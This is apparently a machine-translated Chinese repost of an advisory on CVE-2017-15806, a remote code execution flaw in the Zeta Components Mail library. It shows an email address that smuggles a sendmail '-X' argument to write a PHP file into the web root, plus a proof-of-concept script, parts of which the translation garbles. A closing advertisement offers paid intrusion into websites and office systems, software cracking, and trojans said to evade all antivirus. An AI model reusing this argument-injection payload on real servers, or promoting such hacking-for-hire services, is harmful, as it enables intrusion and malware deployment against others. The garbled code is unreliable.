制造商:Zeta Components
模块:邮件,<=1.8.1
类型:远程执行代码漏洞
发布时间:2017/11/12
作者:凯
CVE-2017-15806
概观
Zeta Components是一个基于PHP 5实现的高质量,通用的应用程序...
制造商:Zeta Components
模块:邮件,<=1.8.1
类型:远程执行代码漏洞
发布时间:2017/11/12
作者:凯
CVE-2017-15806
概观
Zeta Components是一个基于PHP 5实现的高质量,通用的应用程序开发库。该项目于2010年5月加入了Apache Incubator,但出于某种原因于2012年4月离开了Apache Software Foundation。我们在Mail库中发现了一个RCE(远程执行代码)漏洞,可以在服务器上实现任意代码。
详情
该漏洞位于ezcMailMtaTransport类的send函数中。
在/src/transports/mta/mta_transport.php的第73行中,send()函数调用PHP mail()来发送消息。通常,PHP将使用sendmail作为默认MTA。调用mail()函数时它的第五个参数是$ additionalParameters,它允许将其他参数传递给sendmail。在Mail中,分配$ additionalParameters的代码如下:
$ additionalParameters=' - f {$ mail-> returnPath-> email}“;
如果攻击者的传入电子邮件地址是这样的:
'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'
然后将有效负载放在消息体内,sendmail会将日志写入/var/www/html/cache/exploit.php(传递-Xlogfile到sendmail会将日志写入logfile)。这会导致文件在消息正文中包含有效负载,并且可以通过远程访问#domain#/cache/exploit.php来执行有效负载。
通常,漏洞利用需要满足以下三个条件:
使用ezcMailMtaTransport
使用sendmail作为MTA
ezcMailAddress未正确转义。
PoC使用Mailmail; $ mail=new ezcMail(); $ mail-> returnPath=new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'); $ MAIL-> addTo(new ezcMailAddress('some one')); $ mail-> subject='Mail PoC Exploit'; $ mail-> body=new ezcMailText('<php phpinfo();>'); $ transport=new ezcMailMtaTransport(); $ transport->发($邮件);
制造商已发布补丁并建议将Mail升级到1.8.2
黑客业务列表介绍和一般分类:
类别:攻击入侵破解开发
1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量]
2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。
3:破解业务类:软件,加密文件,二次打包,脱壳等。
4:二次开发业务清单:软件二次开发,源代码二次开发等
5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等
备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明
注意:仅接受正式业务,个人无权接受。收集此内容。
-
发表于 2017-11-18 08:00
- 阅读 ( 1758 )
- 分类:黑客技术